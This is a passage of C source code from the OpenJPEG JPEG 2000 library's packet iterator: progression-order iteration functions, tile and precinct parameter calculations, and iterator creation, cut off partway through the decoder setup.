for (pi->y = pi->poc.ty0; pi->y < pi->poc.ty1; pi->y += (OPJ_INT32)(pi->dy - (OPJ_UINT32)(pi->y % (OPJ_INT32)pi->dy))) {
for (pi->x = pi->poc.tx0; pi->x < pi->poc.tx1; pi->x += (OPJ_INT32)(pi->dx - (OPJ_UINT32)(pi->x % (OPJ_INT32)pi->dx))) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
OPJ_UINT32 levelno;
OPJ_INT32 trx0, try0;
OPJ_INT32 trx1, try1;
OPJ_UINT32 rpx, rpy;
OPJ_INT32 prci, prcj;
comp = &pi->comps[pi->compno];
if (pi->resno >= comp->numresolutions) {
continue;
}
res = &comp->resolutions[pi->resno];
levelno = comp->numresolutions - 1 - pi->resno;
trx0 = opj_int_ceildiv(pi->tx0, (OPJ_INT32)(comp->dx << levelno));
try0 = opj_int_ceildiv(pi->ty0, (OPJ_INT32)(comp->dy << levelno));
trx1 = opj_int_ceildiv(pi->tx1, (OPJ_INT32)(comp->dx << levelno));
try1 = opj_int_ceildiv(pi->ty1, (OPJ_INT32)(comp->dy << levelno));
rpx = res->pdx + levelno;
rpy = res->pdy + levelno;
if (!((pi->y % (OPJ_INT32)(comp->dy << rpy) == 0) || ((pi->y == pi->ty0) && ((try0 << levelno) % (1 << rpy))))){
continue;
}
if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) || ((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
continue;
}
if ((res->pw==0)||(res->ph==0)) continue;
if ((trx0==trx1)||(try0==try1)) continue;
prci = opj_int_floordivpow2(opj_int_ceildiv(pi->x, (OPJ_INT32)(comp->dx << levelno)), (OPJ_INT32)res->pdx)
- opj_int_floordivpow2(trx0, (OPJ_INT32)res->pdx);
prcj = opj_int_floordivpow2(opj_int_ceildiv(pi->y, (OPJ_INT32)(comp->dy << levelno)), (OPJ_INT32)res->pdy)
- opj_int_floordivpow2(try0, (OPJ_INT32)res->pdy);
pi->precno = (OPJ_UINT32)(prci + prcj * (OPJ_INT32)res->pw);
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_pcrl(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
goto LABEL_SKIP;
} else {
OPJ_UINT32 compno, resno;
pi->first = 0;
pi->dx = 0;
pi->dy = 0;
for (compno = 0; compno < pi->numcomps; compno++) {
comp = &pi->comps[compno];
for (resno = 0; resno < comp->numresolutions; resno++) {
OPJ_UINT32 dx, dy;
res = &comp->resolutions[resno];
dx = comp->dx * (1u << (res->pdx + comp->numresolutions - 1 - resno));
dy = comp->dy * (1u << (res->pdy + comp->numresolutions - 1 - resno));
pi->dx = !pi->dx ? dx : opj_uint_min(pi->dx, dx);
pi->dy = !pi->dy ? dy : opj_uint_min(pi->dy, dy);
}
}
}
if (!pi->tp_on){
pi->poc.ty0 = pi->ty0;
pi->poc.tx0 = pi->tx0;
pi->poc.ty1 = pi->ty1;
pi->poc.tx1 = pi->tx1;
}
for (pi->y = pi->poc.ty0; pi->y < pi->poc.ty1; pi->y += (OPJ_INT32)(pi->dy - (OPJ_UINT32)(pi->y % (OPJ_INT32)pi->dy))) {
for (pi->x = pi->poc.tx0; pi->x < pi->poc.tx1; pi->x += (OPJ_INT32)(pi->dx - (OPJ_UINT32)(pi->x % (OPJ_INT32)pi->dx))) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
comp = &pi->comps[pi->compno];
for (pi->resno = pi->poc.resno0; pi->resno < opj_uint_min(pi->poc.resno1, comp->numresolutions); pi->resno++) {
OPJ_UINT32 levelno;
OPJ_INT32 trx0, try0;
OPJ_INT32 trx1, try1;
OPJ_UINT32 rpx, rpy;
OPJ_INT32 prci, prcj;
res = &comp->resolutions[pi->resno];
levelno = comp->numresolutions - 1 - pi->resno;
trx0 = opj_int_ceildiv(pi->tx0, (OPJ_INT32)(comp->dx << levelno));
try0 = opj_int_ceildiv(pi->ty0, (OPJ_INT32)(comp->dy << levelno));
trx1 = opj_int_ceildiv(pi->tx1, (OPJ_INT32)(comp->dx << levelno));
try1 = opj_int_ceildiv(pi->ty1, (OPJ_INT32)(comp->dy << levelno));
rpx = res->pdx + levelno;
rpy = res->pdy + levelno;
if (!((pi->y % (OPJ_INT32)(comp->dy << rpy) == 0) || ((pi->y == pi->ty0) && ((try0 << levelno) % (1 << rpy))))){
continue;
}
if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) || ((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
continue;
}
if ((res->pw==0)||(res->ph==0)) continue;
if ((trx0==trx1)||(try0==try1)) continue;
prci = opj_int_floordivpow2(opj_int_ceildiv(pi->x, (OPJ_INT32)(comp->dx << levelno)), (OPJ_INT32)res->pdx)
- opj_int_floordivpow2(trx0, (OPJ_INT32)res->pdx);
prcj = opj_int_floordivpow2(opj_int_ceildiv(pi->y, (OPJ_INT32)(comp->dy << levelno)), (OPJ_INT32)res->pdy)
- opj_int_floordivpow2(try0, (OPJ_INT32)res->pdy);
pi->precno = (OPJ_UINT32)(prci + prcj * (OPJ_INT32)res->pw);
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_cprl(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
goto LABEL_SKIP;
} else {
pi->first = 0;
}
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
OPJ_UINT32 resno;
comp = &pi->comps[pi->compno];
pi->dx = 0;
pi->dy = 0;
for (resno = 0; resno < comp->numresolutions; resno++) {
OPJ_UINT32 dx, dy;
res = &comp->resolutions[resno];
dx = comp->dx * (1u << (res->pdx + comp->numresolutions - 1 - resno));
dy = comp->dy * (1u << (res->pdy + comp->numresolutions - 1 - resno));
pi->dx = !pi->dx ? dx : opj_uint_min(pi->dx, dx);
pi->dy = !pi->dy ? dy : opj_uint_min(pi->dy, dy);
}
if (!pi->tp_on){
pi->poc.ty0 = pi->ty0;
pi->poc.tx0 = pi->tx0;
pi->poc.ty1 = pi->ty1;
pi->poc.tx1 = pi->tx1;
}
for (pi->y = pi->poc.ty0; pi->y < pi->poc.ty1; pi->y += (OPJ_INT32)(pi->dy - (OPJ_UINT32)(pi->y % (OPJ_INT32)pi->dy))) {
for (pi->x = pi->poc.tx0; pi->x < pi->poc.tx1; pi->x += (OPJ_INT32)(pi->dx - (OPJ_UINT32)(pi->x % (OPJ_INT32)pi->dx))) {
for (pi->resno = pi->poc.resno0; pi->resno < opj_uint_min(pi->poc.resno1, comp->numresolutions); pi->resno++) {
OPJ_UINT32 levelno;
OPJ_INT32 trx0, try0;
OPJ_INT32 trx1, try1;
OPJ_UINT32 rpx, rpy;
OPJ_INT32 prci, prcj;
res = &comp->resolutions[pi->resno];
levelno = comp->numresolutions - 1 - pi->resno;
trx0 = opj_int_ceildiv(pi->tx0, (OPJ_INT32)(comp->dx << levelno));
try0 = opj_int_ceildiv(pi->ty0, (OPJ_INT32)(comp->dy << levelno));
trx1 = opj_int_ceildiv(pi->tx1, (OPJ_INT32)(comp->dx << levelno));
try1 = opj_int_ceildiv(pi->ty1, (OPJ_INT32)(comp->dy << levelno));
rpx = res->pdx + levelno;
rpy = res->pdy + levelno;
if (!((pi->y % (OPJ_INT32)(comp->dy << rpy) == 0) || ((pi->y == pi->ty0) && ((try0 << levelno) % (1 << rpy))))){
continue;
}
if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) || ((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
continue;
}
if ((res->pw==0)||(res->ph==0)) continue;
if ((trx0==trx1)||(try0==try1)) continue;
prci = opj_int_floordivpow2(opj_int_ceildiv(pi->x, (OPJ_INT32)(comp->dx << levelno)), (OPJ_INT32)res->pdx)
- opj_int_floordivpow2(trx0, (OPJ_INT32)res->pdx);
prcj = opj_int_floordivpow2(opj_int_ceildiv(pi->y, (OPJ_INT32)(comp->dy << levelno)), (OPJ_INT32)res->pdy)
- opj_int_floordivpow2(try0, (OPJ_INT32)res->pdy);
pi->precno = (OPJ_UINT32)(prci + prcj * (OPJ_INT32)res->pw);
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
}
return OPJ_FALSE;
}
void opj_get_encoding_parameters( const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 p_tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res )
{
/* loop */
OPJ_UINT32 compno, resno;
/* pointers */
const opj_tcp_t *l_tcp = 00;
const opj_tccp_t * l_tccp = 00;
const opj_image_comp_t * l_img_comp = 00;
/* position in x and y of tile */
OPJ_UINT32 p, q;
/* preconditions */
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tileno < p_cp->tw * p_cp->th);
/* initializations */
l_tcp = &p_cp->tcps [p_tileno];
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
/* here calculation of tx0, tx1, ty0, ty1, maxprec, dx and dy */
p = p_tileno % p_cp->tw;
q = p_tileno / p_cp->tw;
/* find extent of tile */
*p_tx0 = opj_int_max((OPJ_INT32)(p_cp->tx0 + p * p_cp->tdx), (OPJ_INT32)p_image->x0);
*p_tx1 = opj_int_min((OPJ_INT32)(p_cp->tx0 + (p + 1) * p_cp->tdx), (OPJ_INT32)p_image->x1);
*p_ty0 = opj_int_max((OPJ_INT32)(p_cp->ty0 + q * p_cp->tdy), (OPJ_INT32)p_image->y0);
*p_ty1 = opj_int_min((OPJ_INT32)(p_cp->ty0 + (q + 1) * p_cp->tdy), (OPJ_INT32)p_image->y1);
/* max precision is 0 (can only grow) */
*p_max_prec = 0;
*p_max_res = 0;
/* take the largest value for dx_min and dy_min */
*p_dx_min = 0x7fffffff;
*p_dy_min = 0x7fffffff;
for (compno = 0; compno < p_image->numcomps; ++compno) {
/* arithmetic variables to calculate */
OPJ_UINT32 l_level_no;
OPJ_INT32 l_rx0, l_ry0, l_rx1, l_ry1;
OPJ_INT32 l_px0, l_py0, l_px1, py1;
OPJ_UINT32 l_pdx, l_pdy;
OPJ_UINT32 l_pw, l_ph;
OPJ_UINT32 l_product;
OPJ_INT32 l_tcx0, l_tcy0, l_tcx1, l_tcy1;
l_tcx0 = opj_int_ceildiv(*p_tx0, (OPJ_INT32)l_img_comp->dx);
l_tcy0 = opj_int_ceildiv(*p_ty0, (OPJ_INT32)l_img_comp->dy);
l_tcx1 = opj_int_ceildiv(*p_tx1, (OPJ_INT32)l_img_comp->dx);
l_tcy1 = opj_int_ceildiv(*p_ty1, (OPJ_INT32)l_img_comp->dy);
if (l_tccp->numresolutions > *p_max_res) {
*p_max_res = l_tccp->numresolutions;
}
/* use custom size for precincts */
for (resno = 0; resno < l_tccp->numresolutions; ++resno) {
OPJ_UINT32 l_dx, l_dy;
/* precinct width and height */
l_pdx = l_tccp->prcw[resno];
l_pdy = l_tccp->prch[resno];
l_dx = l_img_comp->dx * (1u << (l_pdx + l_tccp->numresolutions - 1 - resno));
l_dy = l_img_comp->dy * (1u << (l_pdy + l_tccp->numresolutions - 1 - resno));
/* take the minimum size for dx for each comp and resolution */
*p_dx_min = opj_uint_min(*p_dx_min, l_dx);
*p_dy_min = opj_uint_min(*p_dy_min, l_dy);
/* various calculations of extents */
l_level_no = l_tccp->numresolutions - 1 - resno;
l_rx0 = opj_int_ceildivpow2(l_tcx0, (OPJ_INT32)l_level_no);
l_ry0 = opj_int_ceildivpow2(l_tcy0, (OPJ_INT32)l_level_no);
l_rx1 = opj_int_ceildivpow2(l_tcx1, (OPJ_INT32)l_level_no);
l_ry1 = opj_int_ceildivpow2(l_tcy1, (OPJ_INT32)l_level_no);
l_px0 = opj_int_floordivpow2(l_rx0, (OPJ_INT32)l_pdx) << l_pdx;
l_py0 = opj_int_floordivpow2(l_ry0, (OPJ_INT32)l_pdy) << l_pdy;
l_px1 = opj_int_ceildivpow2(l_rx1, (OPJ_INT32)l_pdx) << l_pdx;
py1 = opj_int_ceildivpow2(l_ry1, (OPJ_INT32)l_pdy) << l_pdy;
l_pw = (l_rx0==l_rx1)?0:(OPJ_UINT32)((l_px1 - l_px0) >> l_pdx);
l_ph = (l_ry0==l_ry1)?0:(OPJ_UINT32)((py1 - l_py0) >> l_pdy);
l_product = l_pw * l_ph;
/* update precision */
if (l_product > *p_max_prec) {
*p_max_prec = l_product;
}
}
++l_img_comp;
++l_tccp;
}
}
void opj_get_all_encoding_parameters( const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res,
OPJ_UINT32 ** p_resolutions )
{
/* loop*/
OPJ_UINT32 compno, resno;
/* pointers*/
const opj_tcp_t *tcp = 00;
const opj_tccp_t * l_tccp = 00;
const opj_image_comp_t * l_img_comp = 00;
/* to store l_dx, l_dy, w and h for each resolution and component.*/
OPJ_UINT32 * lResolutionPtr;
/* position in x and y of tile*/
OPJ_UINT32 p, q;
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_image != 00);
assert(tileno < p_cp->tw * p_cp->th);
/* initializations*/
tcp = &p_cp->tcps [tileno];
l_tccp = tcp->tccps;
l_img_comp = p_image->comps;
/* position in x and y of tile*/
p = tileno % p_cp->tw;
q = tileno / p_cp->tw;
/* here calculation of tx0, tx1, ty0, ty1, maxprec, l_dx and l_dy */
*p_tx0 = (OPJ_INT32)opj_uint_max(p_cp->tx0 + p * p_cp->tdx, p_image->x0);
*p_tx1 = (OPJ_INT32)opj_uint_min(p_cp->tx0 + (p + 1) * p_cp->tdx, p_image->x1);
*p_ty0 = (OPJ_INT32)opj_uint_max(p_cp->ty0 + q * p_cp->tdy, p_image->y0);
*p_ty1 = (OPJ_INT32)opj_uint_min(p_cp->ty0 + (q + 1) * p_cp->tdy, p_image->y1);
/* max precision and resolution is 0 (can only grow)*/
*p_max_prec = 0;
*p_max_res = 0;
/* take the largest value for dx_min and dy_min*/
*p_dx_min = 0x7fffffff;
*p_dy_min = 0x7fffffff;
for (compno = 0; compno < p_image->numcomps; ++compno) {
/* aritmetic variables to calculate*/
OPJ_UINT32 l_level_no;
OPJ_INT32 l_rx0, l_ry0, l_rx1, l_ry1;
OPJ_INT32 l_px0, l_py0, l_px1, py1;
OPJ_UINT32 l_product;
OPJ_INT32 l_tcx0, l_tcy0, l_tcx1, l_tcy1;
OPJ_UINT32 l_pdx, l_pdy , l_pw , l_ph;
lResolutionPtr = p_resolutions[compno];
l_tcx0 = opj_int_ceildiv(*p_tx0, (OPJ_INT32)l_img_comp->dx);
l_tcy0 = opj_int_ceildiv(*p_ty0, (OPJ_INT32)l_img_comp->dy);
l_tcx1 = opj_int_ceildiv(*p_tx1, (OPJ_INT32)l_img_comp->dx);
l_tcy1 = opj_int_ceildiv(*p_ty1, (OPJ_INT32)l_img_comp->dy);
if (l_tccp->numresolutions > *p_max_res) {
*p_max_res = l_tccp->numresolutions;
}
/* use custom size for precincts*/
l_level_no = l_tccp->numresolutions - 1;
for (resno = 0; resno < l_tccp->numresolutions; ++resno) {
OPJ_UINT32 l_dx, l_dy;
/* precinct width and height*/
l_pdx = l_tccp->prcw[resno];
l_pdy = l_tccp->prch[resno];
*lResolutionPtr++ = l_pdx;
*lResolutionPtr++ = l_pdy;
l_dx = l_img_comp->dx * (1u << (l_pdx + l_level_no));
l_dy = l_img_comp->dy * (1u << (l_pdy + l_level_no));
/* take the minimum size for l_dx for each comp and resolution*/
*p_dx_min = (OPJ_UINT32)opj_int_min((OPJ_INT32)*p_dx_min, (OPJ_INT32)l_dx);
*p_dy_min = (OPJ_UINT32)opj_int_min((OPJ_INT32)*p_dy_min, (OPJ_INT32)l_dy);
/* various calculations of extents*/
l_rx0 = opj_int_ceildivpow2(l_tcx0, (OPJ_INT32)l_level_no);
l_ry0 = opj_int_ceildivpow2(l_tcy0, (OPJ_INT32)l_level_no);
l_rx1 = opj_int_ceildivpow2(l_tcx1, (OPJ_INT32)l_level_no);
l_ry1 = opj_int_ceildivpow2(l_tcy1, (OPJ_INT32)l_level_no);
l_px0 = opj_int_floordivpow2(l_rx0, (OPJ_INT32)l_pdx) << l_pdx;
l_py0 = opj_int_floordivpow2(l_ry0, (OPJ_INT32)l_pdy) << l_pdy;
l_px1 = opj_int_ceildivpow2(l_rx1, (OPJ_INT32)l_pdx) << l_pdx;
py1 = opj_int_ceildivpow2(l_ry1, (OPJ_INT32)l_pdy) << l_pdy;
l_pw = (l_rx0==l_rx1)?0:(OPJ_UINT32)((l_px1 - l_px0) >> l_pdx);
l_ph = (l_ry0==l_ry1)?0:(OPJ_UINT32)((py1 - l_py0) >> l_pdy);
*lResolutionPtr++ = l_pw;
*lResolutionPtr++ = l_ph;
l_product = l_pw * l_ph;
/* update precision*/
if (l_product > *p_max_prec) {
*p_max_prec = l_product;
}
--l_level_no;
}
++l_tccp;
++l_img_comp;
}
}
opj_pi_iterator_t * opj_pi_create( const opj_image_t *image,
const opj_cp_t *cp,
OPJ_UINT32 tileno )
{
/* loop*/
OPJ_UINT32 pino, compno;
/* number of poc in the p_pi*/
OPJ_UINT32 l_poc_bound;
/* pointers to tile coding parameters and components.*/
opj_pi_iterator_t *l_pi = 00;
opj_tcp_t *tcp = 00;
const opj_tccp_t *tccp = 00;
/* current packet iterator being allocated*/
opj_pi_iterator_t *l_current_pi = 00;
/* preconditions in debug*/
assert(cp != 00);
assert(image != 00);
assert(tileno < cp->tw * cp->th);
/* initializations*/
tcp = &cp->tcps[tileno];
l_poc_bound = tcp->numpocs+1;
/* memory allocations*/
l_pi = (opj_pi_iterator_t*) opj_calloc((l_poc_bound), sizeof(opj_pi_iterator_t));
if (!l_pi) {
return NULL;
}
l_current_pi = l_pi;
for (pino = 0; pino < l_poc_bound ; ++pino) {
l_current_pi->comps = (opj_pi_comp_t*) opj_calloc(image->numcomps, sizeof(opj_pi_comp_t));
if (! l_current_pi->comps) {
opj_pi_destroy(l_pi, l_poc_bound);
return NULL;
}
l_current_pi->numcomps = image->numcomps;
for (compno = 0; compno < image->numcomps; ++compno) {
opj_pi_comp_t *comp = &l_current_pi->comps[compno];
tccp = &tcp->tccps[compno];
comp->resolutions = (opj_pi_resolution_t*) opj_calloc(tccp->numresolutions, sizeof(opj_pi_resolution_t));
if (!comp->resolutions) {
opj_pi_destroy(l_pi, l_poc_bound);
return 00;
}
comp->numresolutions = tccp->numresolutions;
}
++l_current_pi;
}
return l_pi;
}
void opj_pi_update_encode_poc_and_final ( opj_cp_t *p_cp,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min)
{
/* loop*/
OPJ_UINT32 pino;
/* tile coding parameter*/
opj_tcp_t *l_tcp = 00;
/* current poc being updated*/
opj_poc_t * l_current_poc = 00;
/* number of pocs*/
OPJ_UINT32 l_poc_bound;
OPJ_ARG_NOT_USED(p_max_res);
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_tileno < p_cp->tw * p_cp->th);
/* initializations*/
l_tcp = &p_cp->tcps [p_tileno];
/* number of iterations in the loop */
l_poc_bound = l_tcp->numpocs+1;
/* start at first element, and to make sure the compiler will not make a calculation each time in the loop
store a pointer to the current element to modify rather than l_tcp->pocs[i]*/
l_current_poc = l_tcp->pocs;
l_current_poc->compS = l_current_poc->compno0;
l_current_poc->compE = l_current_poc->compno1;
l_current_poc->resS = l_current_poc->resno0;
l_current_poc->resE = l_current_poc->resno1;
l_current_poc->layE = l_current_poc->layno1;
/* special treatment for the first element*/
l_current_poc->layS = 0;
l_current_poc->prg = l_current_poc->prg1;
l_current_poc->prcS = 0;
l_current_poc->prcE = p_max_prec;
l_current_poc->txS = (OPJ_UINT32)p_tx0;
l_current_poc->txE = (OPJ_UINT32)p_tx1;
l_current_poc->tyS = (OPJ_UINT32)p_ty0;
l_current_poc->tyE = (OPJ_UINT32)p_ty1;
l_current_poc->dx = p_dx_min;
l_current_poc->dy = p_dy_min;
++ l_current_poc;
for (pino = 1;pino < l_poc_bound ; ++pino) {
l_current_poc->compS = l_current_poc->compno0;
l_current_poc->compE= l_current_poc->compno1;
l_current_poc->resS = l_current_poc->resno0;
l_current_poc->resE = l_current_poc->resno1;
l_current_poc->layE = l_current_poc->layno1;
l_current_poc->prg = l_current_poc->prg1;
l_current_poc->prcS = 0;
/* special treatment here different from the first element*/
l_current_poc->layS = (l_current_poc->layE > (l_current_poc-1)->layE) ? l_current_poc->layE : 0;
l_current_poc->prcE = p_max_prec;
l_current_poc->txS = (OPJ_UINT32)p_tx0;
l_current_poc->txE = (OPJ_UINT32)p_tx1;
l_current_poc->tyS = (OPJ_UINT32)p_ty0;
l_current_poc->tyE = (OPJ_UINT32)p_ty1;
l_current_poc->dx = p_dx_min;
l_current_poc->dy = p_dy_min;
++ l_current_poc;
}
}
void opj_pi_update_encode_not_poc ( opj_cp_t *p_cp,
OPJ_UINT32 p_num_comps,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min)
{
/* loop*/
OPJ_UINT32 pino;
/* tile coding parameter*/
opj_tcp_t *l_tcp = 00;
/* current poc being updated*/
opj_poc_t * l_current_poc = 00;
/* number of pocs*/
OPJ_UINT32 l_poc_bound;
/* preconditions in debug*/
assert(p_cp != 00);
assert(p_tileno < p_cp->tw * p_cp->th);
/* initializations*/
l_tcp = &p_cp->tcps [p_tileno];
/* number of iterations in the loop */
l_poc_bound = l_tcp->numpocs+1;
/* start at first element, and to make sure the compiler will not make a calculation each time in the loop
store a pointer to the current element to modify rather than l_tcp->pocs[i]*/
l_current_poc = l_tcp->pocs;
for (pino = 0; pino < l_poc_bound ; ++pino) {
l_current_poc->compS = 0;
l_current_poc->compE = p_num_comps;/*p_image->numcomps;*/
l_current_poc->resS = 0;
l_current_poc->resE = p_max_res;
l_current_poc->layS = 0;
l_current_poc->layE = l_tcp->numlayers;
l_current_poc->prg = l_tcp->prg;
l_current_poc->prcS = 0;
l_current_poc->prcE = p_max_prec;
l_current_poc->txS = (OPJ_UINT32)p_tx0;
l_current_poc->txE = (OPJ_UINT32)p_tx1;
l_current_poc->tyS = (OPJ_UINT32)p_ty0;
l_current_poc->tyE = (OPJ_UINT32)p_ty1;
l_current_poc->dx = p_dx_min;
l_current_poc->dy = p_dy_min;
++ l_current_poc;
}
}
void opj_pi_update_decode_poc (opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res)
{
/* loop*/
OPJ_UINT32 pino;
/* encoding prameters to set*/
OPJ_UINT32 l_bound;
opj_pi_iterator_t * l_current_pi = 00;
opj_poc_t* l_current_poc = 0;
OPJ_ARG_NOT_USED(p_max_res);
/* preconditions in debug*/
assert(p_pi != 00);
assert(p_tcp != 00);
/* initializations*/
l_bound = p_tcp->numpocs+1;
l_current_pi = p_pi;
l_current_poc = p_tcp->pocs;
for (pino = 0;pino<l_bound;++pino) {
l_current_pi->poc.prg = l_current_poc->prg; /* Progression Order #0 */
l_current_pi->first = 1;
l_current_pi->poc.resno0 = l_current_poc->resno0; /* Resolution Level Index #0 (Start) */
l_current_pi->poc.compno0 = l_current_poc->compno0; /* Component Index #0 (Start) */
l_current_pi->poc.layno0 = 0;
l_current_pi->poc.precno0 = 0;
l_current_pi->poc.resno1 = l_current_poc->resno1; /* Resolution Level Index #0 (End) */
l_current_pi->poc.compno1 = l_current_poc->compno1; /* Component Index #0 (End) */
l_current_pi->poc.layno1 = l_current_poc->layno1; /* Layer Index #0 (End) */
l_current_pi->poc.precno1 = p_max_precision;
++l_current_pi;
++l_current_poc;
}
}
void opj_pi_update_decode_not_poc (opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res)
{
/* loop*/
OPJ_UINT32 pino;
/* encoding prameters to set*/
OPJ_UINT32 l_bound;
opj_pi_iterator_t * l_current_pi = 00;
/* preconditions in debug*/
assert(p_tcp != 00);
assert(p_pi != 00);
/* initializations*/
l_bound = p_tcp->numpocs+1;
l_current_pi = p_pi;
for (pino = 0;pino<l_bound;++pino) {
l_current_pi->poc.prg = p_tcp->prg;
l_current_pi->first = 1;
l_current_pi->poc.resno0 = 0;
l_current_pi->poc.compno0 = 0;
l_current_pi->poc.layno0 = 0;
l_current_pi->poc.precno0 = 0;
l_current_pi->poc.resno1 = p_max_res;
l_current_pi->poc.compno1 = l_current_pi->numcomps;
l_current_pi->poc.layno1 = p_tcp->numlayers;
l_current_pi->poc.precno1 = p_max_precision;
++l_current_pi;
}
}
OPJ_BOOL opj_pi_check_next_level( OPJ_INT32 pos,
opj_cp_t *cp,
OPJ_UINT32 tileno,
OPJ_UINT32 pino,
const OPJ_CHAR *prog)
{
OPJ_INT32 i;
opj_tcp_t *tcps =&cp->tcps[tileno];
opj_poc_t *tcp = &tcps->pocs[pino];
if(pos>=0){
for(i=pos;pos>=0;i--){
switch(prog[i]){
case 'R':
if(tcp->res_t==tcp->resE){
if(opj_pi_check_next_level(pos-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
case 'C':
if(tcp->comp_t==tcp->compE){
if(opj_pi_check_next_level(pos-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
case 'L':
if(tcp->lay_t==tcp->layE){
if(opj_pi_check_next_level(pos-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
case 'P':
switch(tcp->prg){
case OPJ_LRCP: /* fall through */
case OPJ_RLCP:
if(tcp->prc_t == tcp->prcE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}
break;
default:
if(tcp->tx0_t == tcp->txE){
/*TY*/
if(tcp->ty0_t == tcp->tyE){
if(opj_pi_check_next_level(i-1,cp,tileno,pino,prog)){
return OPJ_TRUE;
}else{
return OPJ_FALSE;
}
}else{
return OPJ_TRUE;
}/*TY*/
}else{
return OPJ_TRUE;
}
break;
}/*end case P*/
}/*end switch*/
}/*end for*/
}/*end if*/
return OPJ_FALSE;
}
/*
==========================================================
Packet iterator interface
==========================================================
*/
opj_pi_iterator_t *opj_pi_create_decode(opj_image_t *p_image,
opj_cp_t *p_cp,
OPJ_UINT32 p_tile_no)
{
/* loop */
OPJ_UINT32 pino;
OPJ_UINT32 compno, resno;
/* to store w, h, dx and dy fro all components and resolutions */
OPJ_UINT32 * l_tmp_data;
OPJ_UINT32 ** l_tmp_ptr;
/* encoding prameters to set */
OPJ_UINT32 l_max_res;
OPJ_UINT32 l_max_prec;
OPJ_INT32 l_tx0,l_tx1,l_ty0,l_ty1;
OPJ_UINT32 l_dx_min,l_dy_min;
OPJ_UINT32 l_bound;
OPJ_UINT32 l_step_p , l_step_c , l_step_r , l_step_l ;
OPJ_UINT32 l_data_stride;
/* pointers */
opj_pi_iterator_t *l_pi = 00;
opj_tcp_t *l_tcp = 00;
const opj_tccp_t *l_tccp = 00;
opj_pi_comp_t *l_current_comp = 00;
opj_image_comp_t * l_img_comp = 00;
opj_pi_iterator_t * l_current_pi = 00;
OPJ_UINT32 * l_encoding_value_ptr = 00;
/* preconditions in debug */
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tile_no < p_cp->tw * p_cp->th);
/* initializations */
l_tcp = &p_cp->tcps[p_tile_no];
l_bound = l_tcp->numpocs+1;
l_data_stride = 4 * OPJ_J2K_MAXRLVLS;
l_tmp_data = (OPJ_UINT32*)opj_malloc(
